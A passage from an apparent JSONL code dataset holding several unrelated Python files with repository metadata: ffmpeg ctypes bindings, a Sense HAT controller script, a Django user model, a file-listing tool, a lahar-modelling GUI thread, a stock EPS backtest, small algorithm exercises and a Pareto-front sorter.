POINTER(AVCodecParameters)),\n ('info', POINTER(AVStreamInfo)),\n ('pts_wrap_bits', c_int),\n ('first_dts', c_int64),\n ('cur_dts', c_int64),\n ('last_IP_pts', c_int64),\n ('last_IP_duration', c_int),\n ('probe_packets', c_int),\n ('codec_info_nb_frames', c_int),\n ('need_parsing', c_int),\n ('parser', POINTER(AVCodecParserContext)),\n ('last_in_packet_buffer', POINTER(AVPacketList)),\n ('probe_data', AVProbeData),\n ('pts_buffer', c_int64 * (MAX_REORDER_DELAY + 1)),\n ('index_entries', POINTER(AVIndexEntry)),\n ('nb_index_entries', c_int),\n ('index_entries_allocated_size', c_uint),\n ('stream_identifier', c_int),\n ('interleaver_chunk_size', c_int64),\n ('interleaver_chunk_duration', c_int64),\n ('request_probe', c_int),\n ('skip_to_keyframe', c_int),\n ('skip_samples', c_int),\n ('start_skip_samples', c_int64),\n ('first_discard_sample', c_int64),\n ('last_discard_sample', c_int64),\n ('nb_decoded_frames', c_int),\n ('mux_ts_offset', c_int64),\n ('pts_wrap_reference', c_int64),\n ('pts_wrap_behavior', c_int),\n ('update_initial_durations_done', c_int),\n ('pts_reorder_error', c_int64 * (MAX_REORDER_DELAY + 1)),\n ('pts_reorder_error_count', c_uint8 * (MAX_REORDER_DELAY + 1)),\n ('last_dts_for_order_check', c_int64),\n ('dts_ordered', c_uint8),\n ('dts_misordered', c_uint8),\n ('inject_global_side_data', c_int),\n ('display_aspect_ratio', AVRational),\n ('internal', POINTER(AVStreamInternal))\n ]\n\n\nclass AVProgram(Structure):\n pass\n\n\nclass AVChapter(Structure):\n pass\n\n\nclass AVFormatInternal(Structure):\n pass\n\n\nclass AVIOInterruptCB(Structure):\n _fields_ = [\n ('callback', CFUNCTYPE(c_int, c_void_p)),\n ('opaque', c_void_p)\n ]\n\n\nAVClass = libavutil.AVClass\nAVCodec = libavcodec.AVCodec\n\n\nclass AVFormatContext(Structure):\n pass\n\n\nAVFormatContext._fields_ = [\n ('av_class', POINTER(AVClass)),\n ('iformat', POINTER(AVInputFormat)),\n ('oformat', POINTER(AVOutputFormat)),\n ('priv_data', c_void_p),\n ('pb', POINTER(AVIOContext)),\n ('ctx_flags', c_int),\n ('nb_streams', c_uint),\n ('streams', POINTER(POINTER(AVStream))),\n ('filename', c_char * 1024), # Deprecated\n ('url', c_char_p),\n ('start_time', c_int64),\n ('duration', c_int64),\n ('bit_rate', c_int64),\n ('packet_size', c_uint),\n ('max_delay', c_int),\n ('flags', c_int),\n ('probesize', c_int64),\n ('max_analyze_duration', c_int64),\n ('key', POINTER(c_uint8)),\n ('keylen', c_int),\n ('nb_programs', c_uint),\n ('programs', POINTER(POINTER(AVProgram))),\n ('video_codec_id', c_int),\n ('audio_codec_id', c_int),\n ('subtitle_codec_id', c_int),\n ('max_index_size', c_uint),\n ('max_picture_buffer', c_uint),\n ('nb_chapters', c_uint),\n ('chapters', POINTER(POINTER(AVChapter))),\n ('metadata', POINTER(AVDictionary)),\n ('start_time_realtime', c_int64),\n ('fps_probe_size', c_int),\n ('error_recognition', c_int),\n ('interrupt_callback', AVIOInterruptCB),\n ('debug', c_int),\n ('max_interleave_delta', c_int64),\n ('strict_std_compliance', c_int),\n ('event_flags', c_int),\n ('max_ts_probe', c_int),\n ('avoid_negative_ts', c_int),\n ('ts_id', c_int),\n ('audio_preload', c_int),\n ('max_chunk_duration', c_int),\n ('max_chunk_size', c_int),\n ('use_wallclock_as_timestamps', c_int),\n ('avio_flags', c_int),\n ('duration_estimation_method', c_uint),\n ('skip_initial_bytes', c_int64),\n ('correct_ts_overflow', c_uint),\n ('seek2any', c_int),\n ('flush_packets', c_int),\n ('probe_score', c_int),\n ('format_probesize', c_int),\n ('codec_whitelist', c_char_p),\n ('format_whitelist', c_char_p),\n ('internal', POINTER(AVFormatInternal)),\n ('io_repositioned', c_int),\n ('video_codec', POINTER(AVCodec)),\n ('audio_codec', POINTER(AVCodec)),\n ('subtitle_codec', POINTER(AVCodec)),\n ('data_codec', POINTER(AVCodec)),\n ('metadata_header_padding', c_int),\n ('opaque', c_void_p),\n ('control_message_cb', CFUNCTYPE(c_int,\n POINTER(AVFormatContext), c_int, c_void_p,\n c_size_t)),\n ('output_ts_offset', c_int64),\n ('dump_separator', POINTER(c_uint8)),\n ('data_codec_id', c_int),\n # ! one more in here?\n ('protocol_whitelist', c_char_p),\n ('io_open', CFUNCTYPE(c_int,\n POINTER(AVFormatContext),\n POINTER(POINTER(AVIOContext)),\n c_char_p, c_int,\n POINTER(POINTER(AVDictionary)))),\n ('io_close', CFUNCTYPE(None,\n POINTER(AVFormatContext), POINTER(AVIOContext))),\n ('protocol_blacklist', c_char_p),\n ('max_streams', c_int)\n]\n\navformat.av_register_all.restype = None\navformat.av_find_input_format.restype = c_int\navformat.av_find_input_format.argtypes = [c_int]\navformat.avformat_open_input.restype = c_int\navformat.avformat_open_input.argtypes = [\n POINTER(POINTER(AVFormatContext)),\n c_char_p,\n POINTER(AVInputFormat),\n POINTER(POINTER(AVDictionary))]\navformat.avformat_find_stream_info.restype = c_int\navformat.avformat_find_stream_info.argtypes = [\n POINTER(AVFormatContext),\n POINTER(POINTER(AVDictionary))]\navformat.avformat_close_input.restype = None\navformat.avformat_close_input.argtypes = [\n POINTER(POINTER(AVFormatContext))]\navformat.av_read_frame.restype = c_int\navformat.av_read_frame.argtypes = [POINTER(AVFormatContext),\n POINTER(AVPacket)]\navformat.av_seek_frame.restype = c_int\navformat.av_seek_frame.argtypes = [POINTER(AVFormatContext),\n c_int, c_int64, c_int]\navformat.avformat_seek_file.restype = c_int\navformat.avformat_seek_file.argtypes = [POINTER(AVFormatContext),\n c_int, c_int64, c_int64, c_int64, c_int]\navformat.av_guess_frame_rate.restype = AVRational\navformat.av_guess_frame_rate.argtypes = [POINTER(AVFormatContext),\n POINTER(AVStream), POINTER(AVFrame)]\n\n__all__ = [\n 'avformat',\n 'AVSEEK_FLAG_BACKWARD',\n 'AVSEEK_FLAG_BYTE',\n 'AVSEEK_FLAG_ANY',\n 'AVSEEK_FLAG_FRAME',\n 'AVFormatContext'\n]\n","repo_name":"jtl1207/comic-translation","sub_path":"pyglet/media/codecs/ffmpeg_lib/libavformat.py","file_name":"libavformat.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"81"} +{"seq_id":"72175494346","text":"from sense_hat import SenseHat\nimport XboxController\n\nsense = SenseHat()\n\nsense.set_rotation(180)\n# sense.show_message(\"Hello\")\n\ny = 0\nx = 0\nback_colour = (0,0,0)\n\ndef buttonPress(controlId, value): \n global y\n global x\n global back_colour\n if controlId == 17:\n if value == (0, -1):\n y = y + 1\n if value == (1, 0):\n x = x + 1\n if value == (0, 1):\n y = y - 1\n if value == (-1, 0):\n x = x - 1\n if controlId == 9:\n exit()\n\n if x == 8:\n x = 0\n if y == 8:\n y = 0\n if x == -1:\n x = 7\n if y == -1:\n y = 7\n\n red = (255, 0, 0)\n blue = (0, 0, 255)\n green = (0, 255, 0)\n black = (0, 0, 0)\n sense.clear(back_colour)\n sense.set_pixel(x, y, 255,255,255)\n\n\n if controlId == 6:\n back_colour = green\n if controlId == 7:\n back_colour = red\n if controlId == 8:\n back_colour = blue\n if controlId == 13:\n back_colour = black\n \nxboxCont = XboxController.XboxController(controllerCallBack = buttonPress)\nxboxCont.start()\n\n# sense.set_pixel(0,0,255,0,0)\n","repo_name":"IceXPR/piHAT","sub_path":"hat.py","file_name":"hat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28452304430","text":"from django.core.validators import RegexValidator\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, PermissionsMixin\nfrom django.utils.translation import gettext as _\n\n\nclass CustomUser(AbstractUser):\n phone_regex = RegexValidator(\n regex=\"^\\+?[1-9][0-9]{7,14}$\",\n message=\"Phone number must be entered in the format: \"\n \"'+999999999'. Up to 15 digits allowed.\"\n )\n\n GENDER_CHOICES = (\n ('M', _('Male')),\n ('F', _('Female')),\n )\n email = models.EmailField(max_length=255, unique=True, verbose_name=_(\"Email\"))\n first_name = models.CharField(max_length=250, verbose_name=_(\"First name\"))\n last_name = models.CharField(max_length=250, verbose_name=_(\"Last name\"))\n age = models.PositiveIntegerField(null=True, blank=True, verbose_name=_(\"Age\"))\n gender = models.CharField(max_length=1, choices=GENDER_CHOICES,\n null=True,\n blank=True,\n verbose_name=_(\"Gender\"))\n phone_number = models.CharField(validators=[phone_regex],\n max_length=50,\n unique=True,\n verbose_name=_(\"Phone number\"))\n","repo_name":"hatef97/online-shop-goalearn","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26568042729","text":"#!/usr/bin/env python3\nimport os\nimport logging\nimport subprocess\nimport sys\n\nfrom fnmatch import fnmatch\nfrom string import Template\nfrom tempfile import TemporaryDirectory\n\nfrom filefind.config import load_config\nfrom filefind.pattern import Pattern\nfrom filefind.submodules import list_submodules\n\n\nclass AtTemplate(Template):\n \"\"\"Like template, but uses '@' as a delimiter to avoid clashes with\n environment variables.\"\"\"\n delimiter = '@'\n\n\ndef match_patterns(patterns, path_components):\n for pattern in patterns:\n if pattern.match(path_components):\n return True\n return False\n\n\ndef do_list_files(config):\n excluded_dirs = {os.path.join(config.directory, '.git')}\n if config.exclude_submodules:\n for submodule in list_submodules(config.directory):\n excluded_dirs.add(os.path.join(config.directory, submodule))\n\n include_patterns = [Pattern(x) for x in config.include]\n exclude_patterns = [Pattern(x) for x in config.exclude]\n\n for dirpath, dirnames, filenames in os.walk(config.directory):\n relative_dirpath = os.path.relpath(dirpath, config.directory)\n dirpath_components = relative_dirpath.split('/')\n\n # Remove excluded_dirs from dirnames. We must modify the actual\n # dirnames instance, we can't replace it, hence the old-school\n # iteration\n for idx in range(len(dirnames) - 1, -1, -1):\n if os.path.join(dirpath, dirnames[idx]) in excluded_dirs:\n del dirnames[idx]\n elif match_patterns(exclude_patterns, dirpath_components + [dirnames[idx]]):\n del dirnames[idx]\n\n for filename in filenames:\n path_components = dirpath_components + [filename]\n if match_patterns(exclude_patterns, path_components):\n continue\n if include_patterns:\n if not match_patterns(include_patterns, path_components):\n continue\n yield os.path.join(*path_components)\n\n\ndef list_files(config):\n for path in do_list_files(config):\n print(path)\n return 0\n\n\ndef run_commands(config):\n with TemporaryDirectory(prefix='filefind-') as tmp_dir_name:\n file_list = os.path.join(tmp_dir_name, 'lst')\n with open(file_list, 'wt') as fp:\n for path in do_list_files(config):\n print(path, file=fp)\n\n for command in config.exec_:\n tmpl = AtTemplate(command)\n cmd = tmpl.safe_substitute(filelist=file_list)\n logging.info('Running `{}`'.format(cmd))\n returncode = subprocess.call(cmd, cwd=config.directory, shell=True)\n if returncode != 0:\n logging.error('Command `{}` failed with error code {}'.format(cmd, returncode))\n return 1\n return 0\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n config = load_config(sys.argv[1:])\n\n if config.exec_:\n return run_commands(config)\n else:\n return list_files(config)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n# vi: ts=4 sw=4 et\n","repo_name":"agateau/filefind","sub_path":"filefind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"456247696","text":"import traceback\nfrom datetime import datetime\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\nfrom typing import List, Optional, Tuple\n\nfrom pearpy.create_surface_hydro import _create_surface_hydro, generate_output_filenames\nfrom pearpy.distal_inundation import StartPoint, _batch_lahar_inundation\nfrom pearpy.gui.model.main import MainModel\nfrom pearpy.gui.thread._thread import CustomThread, SignalDict, ThreadSignals\nfrom pearpy.starting_point2 import find_starting_points, save2txt\nfrom PySide2.QtWidgets import QMainWindow\nfrom shapely.geometry.point import Point\n\n\nclass MainPageThread(CustomThread):\n def __init__(self, model: MainModel, parent: QMainWindow) -> None:\n super().__init__(parent)\n self.signals = ThreadSignals()\n self.model = model\n\n def _progress_callback_surface_hydro(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n timestamp=int(datetime.now().timestamp()),\n description=\"Generating surface hydro...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def _progress_callback_startingp(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n timestamp=int(datetime.now().timestamp()),\n description=\"Finding starting points...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def _progress_callback_inundation(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n timestamp=int(datetime.now().timestamp()),\n description=\"Generating inundation...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def __run_surface_hydro(self) -> None:\n if isinstance(self.model.temporary_directory, TemporaryDirectory):\n if Path(self.model.temporary_directory.name).exists:\n self.model.temporary_directory.cleanup()\n\n if self.model.preserve_data:\n output_directory = self.model.output_folder.joinpath(\"processing_data\")\n output_directory.mkdir(exist_ok=True)\n else:\n output_temp_directory = TemporaryDirectory()\n output_directory = Path(output_temp_directory.name)\n self.model.temporary_directory = output_temp_directory\n\n (filled, direction, accumulation, stream_r) = generate_output_filenames(\n Path(output_directory).absolute(),\n self.model.surface_hydro.input_dem,\n self.model.surface_hydro.stream_value,\n )\n self.model.surface_hydro.dem_filled = filled\n self.model.surface_hydro.flow_direction = direction\n self.model.surface_hydro.flow_accumulation = accumulation\n self.model.surface_hydro.stream_raster = stream_r\n\n _create_surface_hydro(\n *self.model.surface_hydro.args, self._progress_callback_surface_hydro\n )\n\n def __run_starting_point(\n self,\n ) -> None:\n _starting_points, _processing_data = find_starting_points(\n self.model.starting_point.earlier_dsm,\n self.model.starting_point.later_dsm,\n str(self.model.surface_hydro.flow_direction),\n str(self.model.surface_hydro.stream_raster),\n self.model.starting_point.max_percent_length,\n self.model.starting_point.stream_buffer_size,\n self.model.preserve_data,\n self._progress_callback_startingp,\n )\n\n save2txt(\n _starting_points,\n Path(self.model.output_folder).joinpath(\n f\"{datetime.now().strftime('%Y%m%d-%H%M')}_starting_point.txt\"\n ),\n )\n\n self.model.starting_point.starting_points = _starting_points\n self.model.starting_point.processing_data = _processing_data\n\n def __run_inundation(self, starting_points: List[Tuple[Point, float]]) -> None:\n _starting_points = [\n StartPoint([int(sp.x), int(sp.y)], int(v)) for sp, v in starting_points\n ]\n _batch_lahar_inundation(\n str(self.model.surface_hydro.dem_filled),\n _starting_points,\n self.model.inundation.confidence_limit,\n str(self.model.output_folder),\n self.model.inundation.output_type,\n self._progress_callback_inundation,\n )\n\n def _do_work(self) -> None:\n try:\n self.__run_surface_hydro()\n self.signals.finished.emit()\n\n self.__run_starting_point()\n self.signals.finished.emit()\n\n self.__run_inundation(self.model.starting_point.starting_points)\n if self.model.starting_point.processing_data is not None:\n if self.model.preserve_data:\n self.model.starting_point.processing_data.save(\n self.model.output_folder.joinpath(\"processing_data\")\n )\n self.model.starting_point.reset()\n\n if self.model.temporary_directory is not None:\n if Path(self.model.temporary_directory.name).exists():\n self.model.temporary_directory.cleanup()\n\n self.signals.finished.emit()\n except Exception as error:\n traceback.print_exc()\n self.model.starting_point.reset()\n\n if self.model.temporary_directory is not None:\n if Path(self.model.temporary_directory.name).exists():\n self.model.temporary_directory.cleanup()\n self.signals.error.emit(str(error))\n if self.running:\n self.stop()\n","repo_name":"ruliandaru/pearpy","sub_path":"pearpy/gui/thread/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42496415135","text":"import sys\nimport platform\n\nif \"darwin\" in platform.system().lower():\n # mac\n sys.path.append(\"/Users/KXK2ZO/py_stock_research\")\nelse: # linux\n sys.path.append(\"/home/py_stock_research\")\n\nimport pandas as pd\nimport requests\nimport os\nimport random, math\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom matrix_factorization import BaselineModel, KernelMF\nfrom research.us.forecast_eps import ops\nimport logging\n\nroot_path = \"/Users/KXK2ZO/minor_research/R/jupyter_R/us_study/data\"\n\n\ndef prep_eps_df(raw_eps_df):\n raw_eps_df = raw_eps_df[raw_eps_df[\"EPS_TTM\"].map(lambda x: not pd.isna(x))]\n raw_eps_df[\"EPS_TTM\"] = raw_eps_df[\"EPS_TTM\"].map(lambda x: float(str(x).replace(\"M\", \"\")))\n raw_eps_df[\"MONTH\"] = raw_eps_df[\"YRMO\"].map(lambda x: int(x.split(\"-\")[1]))\n eps_ttm_df_max_month = raw_eps_df.groupby(\"TICKER\").agg(max_month=(\"MONTH\", \"max\")).reset_index()\n end_dec_universe = list(eps_ttm_df_max_month.query(\"max_month==12\").TICKER.unique())\n return raw_eps_df[raw_eps_df[\"TICKER\"].map(lambda x: x in end_dec_universe)]\n\n\ndef single_backtest(yrmo_list, price_df, eps_df, min_amt, mf_run_count, threshold_list, mask_ratio):\n _, price_start_date = ops.convert_yrmo_to_date(max(yrmo_list), \"01\")\n _, price_end_date = ops.convert_yrmo_to_date(max(yrmo_list), \"28\")\n price_start_date = price_start_date - timedelta(days=90)\n price_end_date = price_end_date + timedelta(days=150)\n reduced_price = price_df.query(\"DATE >= '{}'\".format(price_start_date.strftime(\"%Y-%m-%d\"))).query(\n \"DATE <= '{}'\".format(price_end_date.strftime(\"%Y-%m-%d\")))\n reduced_price[\"AMT\"] = reduced_price[\"CLOSE\"] * reduced_price[\"VOLUME\"] / (10 ** 6)\n amt_universe = list(ops.cal_median_amt(reduced_price, min(yrmo_list), max(yrmo_list)).query(\n \"AMTMEDIAN > {}\".format(str(min_amt))).TICKER.unique())\n reduced_eps_df = eps_df[eps_df[\"YRMO\"].map(lambda x: x in yrmo_list)]\n reduced_eps_df = reduced_eps_df[reduced_eps_df[\"TICKER\"].map(lambda x: x in amt_universe)]\n valid_eps_df = ops.get_complete_tickers(reduced_eps_df)\n valid_eps_df_growth = ops.get_eps_growth(valid_eps_df)\n valid_eps_df_growth = valid_eps_df_growth[valid_eps_df_growth[\"EPS_GROWTH\"].map(lambda x: not pd.isna(x))]\n valid_eps_df_growth_class = ops.classify_eps_growth(valid_eps_df_growth, threshold_list)\n logging.info(valid_eps_df_growth_class.head())\n class_list = sorted(list(valid_eps_df_growth_class.CLASS.unique()))\n logging.info(class_list)\n logging.info(len(valid_eps_df_growth_class.TICKER.unique()))\n multiple_mf_result = ops.do_multiple_mf(valid_eps_df_growth_class, mf_run_count, mask_ratio, min(class_list),\n max(class_list))\n match_yrmo_result = ops.convert_forecast_yrmo_to_price_yrmo(multiple_mf_result)\n pre_eps_df = valid_eps_df_growth.copy(True)[[\"TICKER\", \"PRE_EPS\", \"YRMO\"]]\n match_yrmo_result_pre_eps = match_yrmo_result.merge(pre_eps_df, on=[\"TICKER\", \"YRMO\"], how=\"inner\")\n return match_yrmo_result_pre_eps\n\n\ndef test_single_backtest():\n test_price = pd.read_csv(os.path.join(root_path, \"us_study_day_price.csv\"))\n test_yrmos = ['2009-09', '2009-12', '2010-03', '2010-06', '2010-09']\n test_min_amt = 5\n raw_eps = pd.read_json(os.path.join(root_path, \"us_eps_ttm.json\"), convert_dates=False)\n test_eps_df = prep_eps_df(raw_eps)\n actual = single_backtest(yrmo_list=test_yrmos,\n price_df=test_price,\n eps_df=test_eps_df,\n min_amt=test_min_amt,\n mf_run_count=20,\n threshold_list=[-0.5, -0.1, 0.1, 0.5],\n mask_ratio=0.5)\n logging.info(len(actual.TICKER.unique()))\n logging.info(actual.head())\n logging.info(actual.PRED_CLASS_MEDIAN.describe())\n logging.info(actual.PRED_CLASS_MEAN.describe())\n assert actual[actual[\"PRE_EPS\"].map(lambda x: pd.isna(x))].shape[0] == 0\n\n\ndef main():\n print(\"main started\")\n min_amt = 0.5\n mf_run_cnt = 20\n threshold_list_input = [-0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7]\n mask_ratio_input = 0.5\n price = pd.read_csv(os.path.join(root_path, \"us_study_day_price.csv\"))\n raw_eps = pd.read_json(os.path.join(root_path, \"us_eps_ttm.json\"), convert_dates=False)\n all_eps_df = prep_eps_df(raw_eps)\n all_yrmos = sorted(\n list(all_eps_df.groupby(\"YRMO\").agg(CNT=(\"TICKER\", \"count\")).reset_index().query(\"CNT > 1000\").YRMO.unique()))[\n 1:]\n mf_past_yrmo_length = 10\n mf_results = []\n while len(all_yrmos) >= mf_past_yrmo_length:\n subset_yrmos = all_yrmos[:mf_past_yrmo_length]\n all_yrmos = all_yrmos[1:] # reduce by one from first\n print((max(subset_yrmos), len(all_yrmos)))\n temp = single_backtest(subset_yrmos, price, all_eps_df, min_amt, mf_run_cnt, threshold_list_input,\n mask_ratio_input)\n print(len(temp.TICKER.unique()))\n print(temp.head())\n mf_results.append(temp)\n\n mf_result = pd.concat(mf_results, ignore_index=True)\n # mf_result.to_json(os.path.join(root_path, \"multiple_mf_eps_ttm_forest_next_qtr.json\"))\n print(mf_result.YRMO.unique())\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"testkevinkim/py_stock_research","sub_path":"research/us/forecast_eps/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72929451146","text":"\"\"\"\n재귀 이용한 방법\n\"\"\"\nfrom sys import stdin\nfrom typing import List\n\n\ndef show(arr: List[str], start: int) -> None:\n if not arr:\n return\n\n _min = min(arr)\n idx = arr.index(_min)\n res[start + idx] = _min\n print(''.join(res))\n\n show(arr[idx + 1:], start + idx + 1)\n show(arr[:idx], start)\n\n\nif __name__ == \"__main__\":\n x = list(stdin.readline().rstrip())\n\n res = [''] * len(x)\n show(x, 0)","repo_name":"boorooksus/Algorithm-Study","sub_path":"백준/CH09_Implementation/G5-16719-ZOAC2.py","file_name":"G5-16719-ZOAC2.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20584484653","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\n4. 假设有一个数组,只有一个数出现一次,其他数都出现两次,求出现一次的数。\n'''\n\n#利用异或操作,a^a=0,0^a=a,将数组所有的数进行异或,即可得到只出现一次的数\ndef func(nums):\n result = 0\n for i in nums:\n result ^= i\n return result\n\nprint(func([1, 2, 2, 10, 1, 4, 5, 4, 5]))","repo_name":"WuGavin/Code","sub_path":"20181208/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6931427487","text":"from typing import List\nfrom enum import Enum, auto\nimport abc\nfrom collections import defaultdict, Counter\n\nclass MaxMin(Enum):\n MAX = 1\n MIN = 2\n SKIP = 3\n\n def __repr__(self) -> str:\n return self.name\n\nclass MaxMinList:\n def __init__(self, *target_list: List[MaxMin], none_is_good=False):\n \"\"\"\n >>> MaxMinList(MaxMin.MAX, MaxMin.MIN)\n MaxMinList[MAX ,MIN]\n \"\"\"\n self._target_list = target_list\n self._dim = len(target_list)\n self._none_is_good = none_is_good\n\n def __repr__(self) -> str:\n return \"MaxMinList[{}]\".format(\" ,\".join([i.__repr__() for i in self._target_list]))\n \n @property\n def dim(self) -> int: return self._dim\n\n @property\n def list(self) -> List[MaxMin]:\n return self._target_list\n \n @property\n def none_is_good(self):\n return self._none_is_good\n\nclass Domination(Enum):\n GREATER = 1\n EQUAL = 0\n LESS = -1\n \n def __repr__(self) -> str:\n return self.name\n\n\ndef by_none(a, b) -> Domination:\n \"\"\"\n >>> by_none(None, 1)\n GREATER\n >>> by_none(1, None)\n LESS\n >>> by_none(None, None)\n EQUAL\n >>> by_none(1, 1)\n EQUAL\n \n \"\"\"\n if a is None and b is not None:\n return Domination.GREATER\n if b is None and a is not None:\n return Domination.LESS\n return Domination.EQUAL\n\ndef by_value(a, b) -> Domination:\n \"\"\"\n >>> by_value(2, 1)\n GREATER\n >>> by_value(1, 2)\n LESS\n >>> by_value(2, 2)\n EQUAL\n >>> by_value(1, 1)\n EQUAL\n \n \"\"\"\n if a > b:\n return Domination.GREATER\n if a < b:\n return Domination.LESS\n return Domination.EQUAL\n\ndef cmp_to_target(a, b, cmp, target: MaxMin, none_is_good) -> Domination:\n \"\"\"\n >>> cmp_to_target(2, 1, by_value, MaxMin.MAX, False)\n GREATER\n >>> cmp_to_target(1, 2, by_value, MaxMin.MAX, False)\n LESS\n >>> cmp_to_target(2, 2, by_value, MaxMin.MAX, False)\n EQUAL\n >>> cmp_to_target(1, 1, by_value, MaxMin.MAX, False)\n EQUAL\n >>> cmp_to_target(2, 1, by_value, MaxMin.MIN, False)\n LESS\n >>> cmp_to_target(1, 2, by_value, MaxMin.MIN, False)\n GREATER\n >>> cmp_to_target(2, 2, by_value, MaxMin.MIN, False)\n EQUAL\n >>> cmp_to_target(1, 2, by_value, MaxMin.SKIP, False)\n EQUAL\n >>> cmp_to_target(None, 1, by_value, MaxMin.MIN, False)\n LESS\n >>> cmp_to_target(1, None, by_value, MaxMin.MIN, False)\n GREATER\n >>> cmp_to_target(None, None, by_value, MaxMin.MIN, False)\n EQUAL\n >>> cmp_to_target(None, 1, by_none, MaxMin.MAX, False)\n LESS\n >>> cmp_to_target(1, None, by_none, MaxMin.MAX, False)\n GREATER\n >>> cmp_to_target(None, None, by_none, MaxMin.MAX, False)\n EQUAL\n\n \"\"\"\n if target is MaxMin.SKIP:\n return Domination.EQUAL\n if a is None and b is not None:\n return Domination.LESS if not none_is_good else Domination.GREATER\n if a is not None and b is None:\n return Domination.GREATER if not none_is_good else Domination.LESS\n \n if a is None and b is None:\n return Domination.EQUAL\n\n cmp_result = cmp(a ,b)\n if target is MaxMin.MAX:\n return cmp_result\n else:\n if cmp_result is Domination.LESS:\n return Domination.GREATER\n elif cmp_result is Domination.GREATER:\n return Domination.LESS\n else:\n return Domination.EQUAL\n\ndef dominates(a: list, b: list, cmp, targets: MaxMinList) -> Domination:\n \"\"\"\n >>> a = [None]\n >>> b = [1]\n >>> target = MaxMinList(MaxMin.MIN)\n >>> dominates(a, a, by_none, target)\n EQUAL\n >>> dominates(a, b, by_none, target)\n LESS\n >>> dominates(b, a, by_none, target)\n GREATER\n >>> dominates(b, b, by_none, target)\n EQUAL\n >>> a = [1, None]\n >>> b = [1, 1]\n >>> target = MaxMinList(MaxMin.MIN, MaxMin.MIN)\n >>> dominates(a, a, by_none, target)\n EQUAL\n >>> dominates(a, b, by_none, target)\n LESS\n >>> dominates(b, a, by_none, target)\n GREATER\n >>> dominates(b, b, by_none, target)\n EQUAL\n >>> dominates([1, None], [None, 1], by_none, target)\n EQUAL\n >>> a = [2, 1]\n >>> b = [2, 2]\n >>> target = MaxMinList(MaxMin.MAX, MaxMin.MAX)\n >>> dominates(a, a, by_value, target)\n EQUAL\n >>> dominates(a, b, by_value, target)\n LESS\n >>> dominates(b, a, by_value, target)\n GREATER\n >>> dominates(b, b, by_value, target)\n EQUAL\n >>> dominates([1, 0], [0, 1], by_value, target)\n EQUAL\n >>> dominates((None, 0, 1), (0, 0, 0), by_value, MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX, none_is_good=False))\n EQUAL\n \n\n \"\"\"\n results = list()\n for d in range(targets.dim):\n results.append(cmp_to_target(a[d], b[d], cmp, targets.list[d], targets.none_is_good))\n \n is_greater_in_any = False\n for r in results:\n if r is Domination.GREATER:\n is_greater_in_any = True\n break\n\n is_less_in_any = False\n for r in results:\n if r is Domination.LESS:\n is_less_in_any = True\n break\n\n if is_greater_in_any and not is_less_in_any:\n return Domination.GREATER\n if is_less_in_any and not is_greater_in_any:\n return Domination.LESS\n return Domination.EQUAL\n\n\nclass DominanceMatrix:\n \"\"\"\n Dominance matrix used in the fast non dominated search from:\n\n Verma G., Kumar A., Mishra K.K. (2011) A Novel Non-dominated Sorting Algorithm. \n In: Panigrahi B.K., Suganthan P.N., Das S., Satapathy S.C. (eds) Swarm, Evolutionary, and Memetic Computing. \n SEMCCO 2011. Lecture Notes in Computer Science, vol 7076. Springer, Berlin, Heidelberg\n \n\n >>> targets = MaxMinList(MaxMin.MAX, MaxMin.MAX, MaxMin.MAX)\n >>> dominates = Comparison(by_value, targets).compare\n >>> values = [(2,2,2), (0,1,1), (0,0,1), (0,1,0), (1,0,0), (0,0,0)]\n >>> for front in DominanceMatrix(values, dominates).get_pareto_fronts():\n ... print(front)\n [(2, 2, 2)]\n [(0, 1, 1), (1, 0, 0)]\n [(0, 0, 1), (0, 1, 0)]\n [(0, 0, 0)]\n \n \n >>> values = [(1,0,0), (None,1,1), (None,0,1), (0,0,0)]\n >>> for front in DominanceMatrix(values, dominates).get_pareto_fronts():\n ... print(front)\n [(1, 0, 0), (None, 1, 1)]\n [(None, 0, 1), (0, 0, 0)]\n\n \"\"\"\n def __init__(self, values, dominates):\n dimension = len(values)\n self.is_dominating = defaultdict(list)\n self.dominated_by_counter = defaultdict(int)\n self.values = list(values)\n\n for i in range(dimension):\n for j in range(i + 1, dimension):\n a = values[i]\n b = values[j]\n rel = dominates(a, b)\n if rel == Domination.GREATER:\n self.is_dominating[a].append(b)\n 